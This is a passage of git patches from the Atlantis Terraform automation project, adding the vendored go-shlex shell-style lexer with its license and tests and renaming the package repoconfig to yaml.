strings.Join(r.Commands, " ") + if err != nil { + err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out) + r.Meta.Log.Debug("error: %s", err) + return string(out), err + } + r.Meta.Log.Info("successfully ran %q in %q", commandStr, path) + return string(out), nil +} diff --git a/server/events/repoconfig/run_step_test.go b/server/events/repoconfig/run_step_test.go new file mode 100644 index 0000000000..fdab8a9b5f --- /dev/null +++ b/server/events/repoconfig/run_step_test.go @@ -0,0 +1,3 @@ +package repoconfig + +// todo diff --git a/vendor/github.com/flynn-archive/go-shlex/COPYING b/vendor/github.com/flynn-archive/go-shlex/COPYING new file mode 100644 index 0000000000..d645695673 --- /dev/null +++ 
b/vendor/github.com/flynn-archive/go-shlex/COPYING @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). 
+ + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. 
Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative 
Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. 
Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. 
+ + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/vendor/github.com/flynn-archive/go-shlex/Makefile b/vendor/github.com/flynn-archive/go-shlex/Makefile new file mode 100644 index 0000000000..038d9a4896 --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/Makefile @@ -0,0 +1,21 @@ +# Copyright 2011 Google Inc. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +include $(GOROOT)/src/Make.inc + +TARG=shlex +GOFILES=\ + shlex.go\ + +include $(GOROOT)/src/Make.pkg diff --git a/vendor/github.com/flynn-archive/go-shlex/README.md b/vendor/github.com/flynn-archive/go-shlex/README.md new file mode 100644 index 0000000000..c86bcc066f --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/README.md @@ -0,0 +1,2 @@ +go-shlex is a simple lexer for go that supports shell-style quoting, +commenting, and escaping. diff --git a/vendor/github.com/flynn-archive/go-shlex/shlex.go b/vendor/github.com/flynn-archive/go-shlex/shlex.go new file mode 100644 index 0000000000..7aeace801e --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/shlex.go @@ -0,0 +1,457 @@ +/* +Copyright 2012 Google Inc. All Rights Reserved. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package shlex + +/* +Package shlex implements a simple lexer which splits input in to tokens using +shell-style rules for quoting and commenting. +*/ +import ( + "bufio" + "errors" + "fmt" + "io" + "strings" +) + +/* +A TokenType is a top-level token; a word, space, comment, unknown. +*/ +type TokenType int + +/* +A RuneTokenType is the type of a UTF-8 character; a character, quote, space, escape. +*/ +type RuneTokenType int + +type lexerState int + +type Token struct { + tokenType TokenType + value string +} + +/* +Two tokens are equal if both their types and values are equal. 
A nil token can +never equal another token. +*/ +func (a *Token) Equal(b *Token) bool { + if a == nil || b == nil { + return false + } + if a.tokenType != b.tokenType { + return false + } + return a.value == b.value +} + +const ( + RUNE_CHAR string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-,/@$*()+=><:;&^%~|!?[]{}" + RUNE_SPACE string = " \t\r\n" + RUNE_ESCAPING_QUOTE string = "\"" + RUNE_NONESCAPING_QUOTE string = "'" + RUNE_ESCAPE = "\\" + RUNE_COMMENT = "#" + + RUNETOKEN_UNKNOWN RuneTokenType = 0 + RUNETOKEN_CHAR RuneTokenType = 1 + RUNETOKEN_SPACE RuneTokenType = 2 + RUNETOKEN_ESCAPING_QUOTE RuneTokenType = 3 + RUNETOKEN_NONESCAPING_QUOTE RuneTokenType = 4 + RUNETOKEN_ESCAPE RuneTokenType = 5 + RUNETOKEN_COMMENT RuneTokenType = 6 + RUNETOKEN_EOF RuneTokenType = 7 + + TOKEN_UNKNOWN TokenType = 0 + TOKEN_WORD TokenType = 1 + TOKEN_SPACE TokenType = 2 + TOKEN_COMMENT TokenType = 3 + + STATE_START lexerState = 0 + STATE_INWORD lexerState = 1 + STATE_ESCAPING lexerState = 2 + STATE_ESCAPING_QUOTED lexerState = 3 + STATE_QUOTED_ESCAPING lexerState = 4 + STATE_QUOTED lexerState = 5 + STATE_COMMENT lexerState = 6 + + INITIAL_TOKEN_CAPACITY int = 100 +) + +/* +A type for classifying characters. This allows for different sorts of +classifiers - those accepting extended non-ascii chars, or strict posix +compatibility, for example. +*/ +type TokenClassifier struct { + typeMap map[int32]RuneTokenType +} + +func addRuneClass(typeMap *map[int32]RuneTokenType, runes string, tokenType RuneTokenType) { + for _, rune := range runes { + (*typeMap)[int32(rune)] = tokenType + } +} + +/* +Create a new classifier for basic ASCII characters. 
+*/ +func NewDefaultClassifier() *TokenClassifier { + typeMap := map[int32]RuneTokenType{} + addRuneClass(&typeMap, RUNE_CHAR, RUNETOKEN_CHAR) + addRuneClass(&typeMap, RUNE_SPACE, RUNETOKEN_SPACE) + addRuneClass(&typeMap, RUNE_ESCAPING_QUOTE, RUNETOKEN_ESCAPING_QUOTE) + addRuneClass(&typeMap, RUNE_NONESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE) + addRuneClass(&typeMap, RUNE_ESCAPE, RUNETOKEN_ESCAPE) + addRuneClass(&typeMap, RUNE_COMMENT, RUNETOKEN_COMMENT) + return &TokenClassifier{ + typeMap: typeMap} +} + +func (classifier *TokenClassifier) ClassifyRune(rune int32) RuneTokenType { + return classifier.typeMap[rune] +} + +/* +A type for turning an input stream in to a sequence of strings. Whitespace and +comments are skipped. +*/ +type Lexer struct { + tokenizer *Tokenizer +} + +/* +Create a new lexer. +*/ +func NewLexer(r io.Reader) (*Lexer, error) { + + tokenizer, err := NewTokenizer(r) + if err != nil { + return nil, err + } + lexer := &Lexer{tokenizer: tokenizer} + return lexer, nil +} + +/* +Return the next word, and an error value. If there are no more words, the error +will be io.EOF. +*/ +func (l *Lexer) NextWord() (string, error) { + var token *Token + var err error + for { + token, err = l.tokenizer.NextToken() + if err != nil { + return "", err + } + switch token.tokenType { + case TOKEN_WORD: + { + return token.value, nil + } + case TOKEN_COMMENT: + { + // skip comments + } + default: + { + panic(fmt.Sprintf("Unknown token type: %v", token.tokenType)) + } + } + } + return "", io.EOF +} + +/* +A type for turning an input stream in to a sequence of typed tokens. +*/ +type Tokenizer struct { + input *bufio.Reader + classifier *TokenClassifier +} + +/* +Create a new tokenizer. +*/ +func NewTokenizer(r io.Reader) (*Tokenizer, error) { + input := bufio.NewReader(r) + classifier := NewDefaultClassifier() + tokenizer := &Tokenizer{ + input: input, + classifier: classifier} + return tokenizer, nil +} + +/* +Scan the stream for the next token. 
+ +This uses an internal state machine. It will panic if it encounters a character +which it does not know how to handle. +*/ +func (t *Tokenizer) scanStream() (*Token, error) { + state := STATE_START + var tokenType TokenType + value := make([]int32, 0, INITIAL_TOKEN_CAPACITY) + var ( + nextRune int32 + nextRuneType RuneTokenType + err error + ) +SCAN: + for { + nextRune, _, err = t.input.ReadRune() + nextRuneType = t.classifier.ClassifyRune(nextRune) + if err != nil { + if err == io.EOF { + nextRuneType = RUNETOKEN_EOF + err = nil + } else { + return nil, err + } + } + switch state { + case STATE_START: // no runes read yet + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + return nil, io.EOF + } + case RUNETOKEN_CHAR: + { + tokenType = TOKEN_WORD + value = append(value, nextRune) + state = STATE_INWORD + } + case RUNETOKEN_SPACE: + { + } + case RUNETOKEN_ESCAPING_QUOTE: + { + tokenType = TOKEN_WORD + state = STATE_QUOTED_ESCAPING + } + case RUNETOKEN_NONESCAPING_QUOTE: + { + tokenType = TOKEN_WORD + state = STATE_QUOTED + } + case RUNETOKEN_ESCAPE: + { + tokenType = TOKEN_WORD + state = STATE_ESCAPING + } + case RUNETOKEN_COMMENT: + { + tokenType = TOKEN_COMMENT + state = STATE_COMMENT + } + default: + { + return nil, errors.New(fmt.Sprintf("Unknown rune: %v", nextRune)) + } + } + } + case STATE_INWORD: // in a regular word + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_COMMENT: + { + value = append(value, nextRune) + } + case RUNETOKEN_SPACE: + { + t.input.UnreadRune() + break SCAN + } + case RUNETOKEN_ESCAPING_QUOTE: + { + state = STATE_QUOTED_ESCAPING + } + case RUNETOKEN_NONESCAPING_QUOTE: + { + state = STATE_QUOTED + } + case RUNETOKEN_ESCAPE: + { + state = STATE_ESCAPING + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_ESCAPING: // the next rune after an escape character + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = 
errors.New("EOF found after escape character") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT: + { + state = STATE_INWORD + value = append(value, nextRune) + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_ESCAPING_QUOTED: // the next rune after an escape character, in double quotes + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found after escape character") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT: + { + state = STATE_QUOTED_ESCAPING + value = append(value, nextRune) + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_QUOTED_ESCAPING: // in escaping double quotes + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found when expecting closing quote.") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_SPACE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_COMMENT: + { + value = append(value, nextRune) + } + case RUNETOKEN_ESCAPING_QUOTE: + { + state = STATE_INWORD + } + case RUNETOKEN_ESCAPE: + { + state = STATE_ESCAPING_QUOTED + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_QUOTED: // in non-escaping single quotes + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found when expecting closing quote.") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT: + { + value = append(value, nextRune) + } + case RUNETOKEN_NONESCAPING_QUOTE: + { + state = STATE_INWORD + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_COMMENT: + { + switch nextRuneType { + 
case RUNETOKEN_EOF: + { + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT, RUNETOKEN_NONESCAPING_QUOTE: + { + value = append(value, nextRune) + } + case RUNETOKEN_SPACE: + { + if nextRune == '\n' { + state = STATE_START + break SCAN + } else { + value = append(value, nextRune) + } + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + default: + { + panic(fmt.Sprintf("Unexpected state: %v", state)) + } + } + } + token := &Token{ + tokenType: tokenType, + value: string(value)} + return token, err +} + +/* +Return the next token in the stream, and an error value. If there are no more +tokens available, the error value will be io.EOF. +*/ +func (t *Tokenizer) NextToken() (*Token, error) { + return t.scanStream() +} + +/* +Split a string in to a slice of strings, based upon shell-style rules for +quoting, escaping, and spaces. +*/ +func Split(s string) ([]string, error) { + l, err := NewLexer(strings.NewReader(s)) + if err != nil { + return nil, err + } + subStrings := []string{} + for { + word, err := l.NextWord() + if err != nil { + if err == io.EOF { + return subStrings, nil + } + return subStrings, err + } + subStrings = append(subStrings, word) + } + return subStrings, nil +} diff --git a/vendor/github.com/flynn-archive/go-shlex/shlex_test.go b/vendor/github.com/flynn-archive/go-shlex/shlex_test.go new file mode 100644 index 0000000000..7551f7c598 --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/shlex_test.go @@ -0,0 +1,162 @@ +/* +Copyright 2012 Google Inc. All Rights Reserved. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. 
+You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package shlex + +import ( + "strings" + "testing" +) + +func checkError(err error, t *testing.T) { + if err != nil { + t.Error(err) + } +} + +func TestClassifier(t *testing.T) { + classifier := NewDefaultClassifier() + runeTests := map[int32]RuneTokenType{ + 'a': RUNETOKEN_CHAR, + ' ': RUNETOKEN_SPACE, + '"': RUNETOKEN_ESCAPING_QUOTE, + '\'': RUNETOKEN_NONESCAPING_QUOTE, + '#': RUNETOKEN_COMMENT} + for rune, expectedType := range runeTests { + foundType := classifier.ClassifyRune(rune) + if foundType != expectedType { + t.Logf("Expected type: %v for rune '%c'(%v). Found type: %v.", expectedType, rune, rune, foundType) + t.Fail() + } + } +} + +func TestTokenizer(t *testing.T) { + testInput := strings.NewReader("one two \"three four\" \"five \\\"six\\\"\" seven#eight # nine # ten\n eleven") + expectedTokens := []*Token{ + &Token{ + tokenType: TOKEN_WORD, + value: "one"}, + &Token{ + tokenType: TOKEN_WORD, + value: "two"}, + &Token{ + tokenType: TOKEN_WORD, + value: "three four"}, + &Token{ + tokenType: TOKEN_WORD, + value: "five \"six\""}, + &Token{ + tokenType: TOKEN_WORD, + value: "seven#eight"}, + &Token{ + tokenType: TOKEN_COMMENT, + value: " nine # ten"}, + &Token{ + tokenType: TOKEN_WORD, + value: "eleven"}} + + tokenizer, err := NewTokenizer(testInput) + checkError(err, t) + for _, expectedToken := range expectedTokens { + foundToken, err := tokenizer.NextToken() + checkError(err, t) + if !foundToken.Equal(expectedToken) { + t.Error("Expected token:", expectedToken, ". 
Found:", foundToken) + } + } +} + +func TestLexer(t *testing.T) { + testInput := strings.NewReader("one") + expectedWord := "one" + lexer, err := NewLexer(testInput) + checkError(err, t) + foundWord, err := lexer.NextWord() + checkError(err, t) + if expectedWord != foundWord { + t.Error("Expected word:", expectedWord, ". Found:", foundWord) + } +} + +func TestSplitSimple(t *testing.T) { + testInput := "one two three" + expectedOutput := []string{"one", "two", "three"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error:", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } +} + +func TestSplitEscapingQuotes(t *testing.T) { + testInput := "one \"два ${three}\" four" + expectedOutput := []string{"one", "два ${three}", "four"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error:", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } +} + +func TestGlobbingExpressions(t *testing.T) { + testInput := "onefile *file one?ile onefil[de]" + expectedOutput := []string{"onefile", "*file", "one?ile", "onefil[de]"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. 
Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } + +} + +func TestSplitNonEscapingQuotes(t *testing.T) { + testInput := "one 'два ${three}' four" + expectedOutput := []string{"one", "два ${three}", "four"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error:", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } +} From 69c788ec663e3b086eecdb70a8fac8b35c26c4e3 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 7 Jun 2018 15:40:48 +0100 Subject: [PATCH 13/69] Rename package repoconfig to yaml --- server/events/apply_executor.go | 4 +- server/events/plan_executor.go | 4 +- server/events/repoconfig/run_step_test.go | 3 - .../events/{repoconfig => yaml}/apply_step.go | 2 +- .../{repoconfig => yaml}/apply_step_test.go | 16 +-- server/events/{repoconfig => yaml}/config.go | 2 +- .../{repoconfig => yaml}/execution_planner.go | 6 +- .../events/{repoconfig => yaml}/init_step.go | 2 +- .../{repoconfig => yaml}/init_step_test.go | 8 +- .../events/{repoconfig => yaml}/plan_step.go | 2 +- .../{repoconfig => yaml}/plan_step_test.go | 28 ++-- server/events/{repoconfig => yaml}/reader.go | 6 +- .../{repoconfig => yaml}/reader_test.go | 124 +++++++++++------- .../events/{repoconfig => yaml}/repoconfig.go | 2 +- .../events/{repoconfig => yaml}/run_step.go | 2 +- server/events/yaml/run_step_test.go | 3 + server/server.go | 6 +- 17 files changed, 123 insertions(+), 97 deletions(-) delete mode 100644 server/events/repoconfig/run_step_test.go rename server/events/{repoconfig => 
yaml}/apply_step.go (97%) rename server/events/{repoconfig => yaml}/apply_step_test.go (89%) rename server/events/{repoconfig => yaml}/config.go (99%) rename server/events/{repoconfig => yaml}/execution_planner.go (95%) rename server/events/{repoconfig => yaml}/init_step.go (97%) rename server/events/{repoconfig => yaml}/init_step_test.go (92%) rename server/events/{repoconfig => yaml}/plan_step.go (99%) rename server/events/{repoconfig => yaml}/plan_step_test.go (95%) rename server/events/{repoconfig => yaml}/reader.go (93%) rename server/events/{repoconfig => yaml}/reader_test.go (85%) rename server/events/{repoconfig => yaml}/repoconfig.go (99%) rename server/events/{repoconfig => yaml}/run_step.go (97%) create mode 100644 server/events/yaml/run_step_test.go diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index 534546997d..6562d8ab8e 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -15,11 +15,11 @@ package events import ( "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml" ) // ApplyExecutor handles executing terraform apply. @@ -31,7 +31,7 @@ type ApplyExecutor struct { AtlantisWorkspace AtlantisWorkspace ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender - ExecutionPlanner *repoconfig.ExecutionPlanner + ExecutionPlanner *yaml.ExecutionPlanner } // Execute executes apply for the ctx. 
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index 4983c17701..a620f2cb43 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -18,10 +18,10 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" + "github.com/runatlantis/atlantis/server/events/yaml" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator @@ -39,7 +39,7 @@ type PlanExecutor struct { Workspace AtlantisWorkspace ProjectFinder ProjectFinder ProjectLocker ProjectLocker - ExecutionPlanner *repoconfig.ExecutionPlanner + ExecutionPlanner *yaml.ExecutionPlanner LockURLGenerator LockURLGenerator } diff --git a/server/events/repoconfig/run_step_test.go b/server/events/repoconfig/run_step_test.go deleted file mode 100644 index fdab8a9b5f..0000000000 --- a/server/events/repoconfig/run_step_test.go +++ /dev/null @@ -1,3 +0,0 @@ -package repoconfig - -// todo diff --git a/server/events/repoconfig/apply_step.go b/server/events/yaml/apply_step.go similarity index 97% rename from server/events/repoconfig/apply_step.go rename to server/events/yaml/apply_step.go index d883c3a02c..4b6a360612 100644 --- a/server/events/repoconfig/apply_step.go +++ b/server/events/yaml/apply_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/repoconfig/apply_step_test.go b/server/events/yaml/apply_step_test.go similarity index 89% rename from server/events/repoconfig/apply_step_test.go rename to server/events/yaml/apply_step_test.go index 37e0af2f71..f2066140e2 100644 --- a/server/events/repoconfig/apply_step_test.go +++ b/server/events/yaml/apply_step_test.go @@ 
-1,4 +1,4 @@ -package repoconfig_test +package yaml_test import ( "io/ioutil" @@ -8,15 +8,15 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml" . "github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := repoconfig.ApplyStep{ - Meta: repoconfig.StepMeta{ + s := yaml.ApplyStep{ + Meta: yaml.StepMeta{ Workspace: "workspace", AbsolutePath: "nonexistent/path", DirRelativeToRepoRoot: ".", @@ -33,8 +33,8 @@ func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - s := repoconfig.ApplyStep{ - Meta: repoconfig.StepMeta{ + s := yaml.ApplyStep{ + Meta: yaml.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", @@ -58,8 +58,8 @@ func TestRun_Success(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.11.4") - s := repoconfig.ApplyStep{ - Meta: repoconfig.StepMeta{ + s := yaml.ApplyStep{ + Meta: yaml.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", diff --git a/server/events/repoconfig/config.go b/server/events/yaml/config.go similarity index 99% rename from server/events/repoconfig/config.go rename to 